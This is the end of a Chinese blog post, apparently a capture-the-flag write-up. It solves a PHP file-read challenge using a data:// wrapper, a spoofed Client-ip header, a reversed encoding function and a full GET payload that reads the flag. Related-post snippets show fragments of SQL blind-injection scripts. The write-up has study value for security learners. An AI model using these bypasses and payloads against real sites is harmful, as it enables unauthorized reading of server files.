# 鉴定IP地址是否有误,再通过file_get_contents鉴定状态?
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
	echo "Your REQUEST is:".change($_GET['file']);
    # 实打实的文件内容读取
	echo file_get_contents(change($_GET['file'])); }
?>

这里有一点倒是不得不说:第一个接触file_get_contentsh函数的时get的 ‘2333’ 参数。

file_get_contents($_GET['2333']) === 'todat is a happy day' )
# 意思是核对文件信息是不是 “todat is a happy day”
# 能直接传入文件信息的协议属data莫属了
?2333=data://text,plain,todat is a happy day

暂时解决掉一个参数。

还有一个,就是那个IP地址的爆破。

# 放在BP测试器爆破一下就行。
# 爆破的结果是这个http数据头
Client-ip : 127.0.0.1

接下来剩下一个读文件的get参数。

上面那个函数正好加密了get参数再拿值,这里需要先反写:

function unchange($v){ 
    $re = '';
    
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr(ord($v[$i])-$i*2); 
    } 
    return base64_encode($re); 
}

调用这个函数对我们想读取的文件进行加密就行了:

var_dump(unchange('index.php'));
#得到:string(12) "aWxgX3AkZFpg"
var_dump(unchange('index.php'));
#得到:string(12) "ZmpdYSZmXGI="

优先读取flag,完整的payload如下:

GET:?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
header: Client-ip : 127.0.0.1

return: # 注释内扒拉出源代码
<?php
$flag = 'flag{5843a57f-3446-425c-9a56-d3e1e1fabb51}';
echo "Flag is here~But how to get it?";
?>

总结

file_get_contents()	
    # 利用点:
    /*
    伪协议:
    data://text,plain,.....
    data://text,plain;base64,....
    */
header
    # 数据头本地IP地址字段的爆破
php编码机制
    # b u p t=23333%0a
    # https://www.freebuf.com/articles/web/213359.html
%0a换行绕过
    # preg_match匹配,正则表达式形如这个/^23333$/ ==> /^....$/
JSFuck解码js编码的()+[]!
    # console.log输出这个编码的结果
    # 浏览器console直接输出这个 ()+[]! 编码的执行结果
  	# 在线执行:https://jsfuck.com/
SYW_SEC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HDFView-3.1.2-win10_64-vs16压缩套娃.zip
03-17
用于 HDF4、HDF5(HDF,Hierarchical Data Format)、.nc(NetCDF,network Common Data Form)等文件的打开预览。
BUUCTF:[WUSTCTF2020]颜值成绩查询
末初的CSDN博客
04-07 1498
SQL盲注 2^if(ascii(mid(database(),1,1))>0,0,1); 先fuzz测试查看有没有过滤了什么,这里过滤了空格,但是我们可以收用/**/来分隔sql语句 先看我根据我的一篇文章布尔型盲注python脚本(功能超级完整)改的脚本 import requests def ascii_str(): # 生成库名表名字符所在的字符列表字典 str_li...
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 147
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
[WUSTCTF2020]颜值成绩查询
wp568的博客
09-14 75
输出: flag{e58481f5-0a73-4f49-a6c5-e92e6806eca2}输出: information_schema,ctf。输出: flag,score。输出: flag,value。即相同为0,不同为1。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 695
[WUSTCTF2020]颜值成绩查询(布尔注入)
2010 “中兴捧月”校园程序设计大赛---俄罗斯套娃源码
05-21
本人写的一个关于俄罗斯套娃的源程序,其目的是抛砖引玉,欢迎大家分享优质、高效的代码。 经过本人强力测试,可以处理重量为0的娃娃。其实这也是这个程序比较难的地方。娃娃的重量为0,就表示该路口没有套娃可以...
众星捧月-俄罗斯套娃游戏开发
06-19
将Cross.txt文本中的的所代表的套娃重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
R2S-R4S-X86-OpenWrt:适用于Nanopi R2SR4SX86的OpenWrt
03-13
预配置了部分插件(包括但不限于DNS套娃,使用时先将SSRP的DNS上游提前选成本机5335端口,然后再ADG中勾上启用就好*“管理帐户root,密码admin”,如果要作用于路由器本身,可以把lan和wan的dns都配置成127.0.0.1,...
[BUUOJ][WUSTCTF2020]颜值成绩查询 ---二分法
Y4tacker的博客
08-01 7497
import requests url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum=" result = "" i = 0 while True: i = i + 1 head = 32 tail = 127 while head < tail: mid = (head + tail) >> 1 # payload = "
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 388
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1862
sql布尔盲注
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 368
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。
最新发布
XING的博客
05-03 1294
基于Springboot的旅游管理系统(有报告)。Javaee项目,springboot项目。数据库作为系统数据储存平台,实现了基于B/S结构的Web系统。界面简洁,操作简单。采用M(model)V(view)C(controller)三层体系结构,通过。
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SYW_SEC

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值